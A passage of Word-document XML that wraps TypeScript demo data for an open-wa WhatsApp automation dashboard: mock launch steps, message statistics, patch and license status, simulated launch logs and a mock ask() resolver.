          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.navigation.gotoWaWeb", status: "done" as const, durationMs: 1200, details: { url: "https://web.whatsapp.com" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.modules.wait", status: "done" as const, durationMs: 3100, details: { success: true } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.auth.check", status: "done" as const, durationMs: 450, details: { isAuthenticated: true, method: "direct" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.license.preload", status: "done" as const, durationMs: 180, details: { success: true, status: "valid", source: "cached" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.wapi.inject", status: "done" as const, durationMs: 620, details: { success: true } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.session.validityCheck", status: "done" as const, durationMs: 85, details: { valid: true, usable: true, hasRuntime: true, hasStore: true, sessionLoaded: true } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.patch.init", status: "done" as const, durationMs: 340, details: { applied: ["core_fix", "store_bridge"], outcome: "ready" } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { step: "launch.client.finalize", status: "done" as const, durationMs: 120, details: { state: "READY", success: true, outcome: "ready"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Stats (derived aggregates for homepage charts) ──────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const dayNames = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const todayIdx = new Date().getDay()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demoMessageVolume = Array.from({ length: 7 }, (_, i) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const dayIdx = (todayIdx - 6 + i + 7) % 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const counts = [42, 67, 53, 89, 71, 94, 147]  // last 7 days</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  return { day: dayNames[dayIdx], count: counts[i]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demoMessageTypes = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { type: "Text", count: 312, color: "hsl(210, 80%, 60%)" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { type: "Image", count: 89, color: "hsl(150, 70%, 50%)" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { type: "Video", count: 34, color: "hsl(280, 70%, 60%)" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { type: "Audio", count: 28, color: "hsl(40, 85%, 55%)" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { type: "Document", count: 19, color: "hsl(0, 70%, 60%)" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { type: "Sticker", count: 45, color: "hsl(330, 70%, 60%)" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { type: "Location", count: 8, color: "hsl(180, 60%, 50%)"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demoStats = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  messagesToday: 147,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  activeChats: 23,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  totalContacts: demoContacts.length,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  totalChats: demoChats.length,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  unreadTotal: demoChats.reduce((sum, c) =&gt; sum + (c.unreadCount || 0),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Health (for /health page) ───────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const demoPatches = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { patchId: "core_fix", description: "Core store bridge patch", required: true, outcome: "applied" as const },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { patchId: "store_bridge", description: "Store module reconnection", required: true, outcome: "applied" as const },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { patchId: "media_decrypt_v2", description: "Media decryption fallback", required: false, outcome: "not_applicable" as const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demoLicense = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  status: "valid" as const,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  source: "cached" as const,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  keyType: "premium",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  detail: "License validated from local cache",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demoReconnections = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { timestamp: tsAgo(78), reason: "transport_close", downtimeMs: 3200, success: true },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { timestamp: tsAgo(360), reason: "wapi_missing", downtimeMs: 1800, success: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Launch Log Lines (for pre-launch console view) ──────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const demoLaunchLogs: Array&lt;{ text: string; type: "info" | "success" | "error" | "warning" | "dim"; delay: number }&gt; = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Initializing open-wa v5.0.0…", type: "info", delay: 0 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Session ID: my-session", type: "dim", delay: 200 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Headless mode: false", type: "dim", delay: 100 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Resolving configuration…", type: "info", delay: 400 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Configuration loaded", type: "success", delay: 300 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Logger initialized", type: "success", delay: 200 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Checking for updates…", type: "info", delay: 800 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Running latest version (5.0.0)", type: "success", delay: 500 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Launching browser (Chromium)…", type: "info", delay: 300 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Browser PID: 48291", type: "dim", delay: 2200 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Browser launched", type: "success", delay: 100 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Initializing page…", type: "info", delay: 400 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Viewport: 1920×1080", type: "dim", delay: 800 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Navigating to web.whatsapp.com…", type: "info", delay: 300 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Navigation complete", type: "success", delay: 1200 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Waiting for WhatsApp modules…", type: "info", delay: 500 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Core modules loaded", type: "success", delay: 3000 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Checking authentication state…", type: "info", delay: 400 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "No existing session found", type: "warning", delay: 600 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "QR code generated — scan to connect", type: "warning", delay: 300 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Waiting for QR scan…", type: "info", delay: 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Extra lines that play after "QR scanned"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const demoPostScanLogs: Array&lt;{ text: string; type: "info" | "success" | "error" | "warning" | "dim"; delay: number }&gt; = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "QR code scanned!", type: "success", delay: 0 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Pairing with device…", type: "info", delay: 800 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Syncing messages…", type: "info", delay: 1200 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Validating license…", type: "info", delay: 600 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "License valid (cached)", type: "success", delay: 300 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Injecting WAPI…", type: "info", delay: 400 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "WAPI injected", type: "success", delay: 600 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Running session validity check…", type: "info", delay: 200 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Session valid and usable", type: "success", delay: 300 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Applying patches: core_fix, store_bridge", type: "info", delay: 300 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "2 patches applied", type: "success", delay: 400 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Finalizing client…", type: "info", delay: 200 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { text: "Session READY — client is live ✓", type: "success", delay: 500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Resolve a mock `ask()` call for demo mode */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export function resolveDemoAsk(method: string, _args?: unknown): unknown {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  switch (method) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getHostNumber": return demoSession.hostNumber</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getWAVersion": return demoSession.waVersion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getBatteryLevel": return demoSession.battery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getConnectionState": return demoSession.connectionState</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getAllChats": return demoChats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getAllContacts": return demoContacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getAllMessagesInChat": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
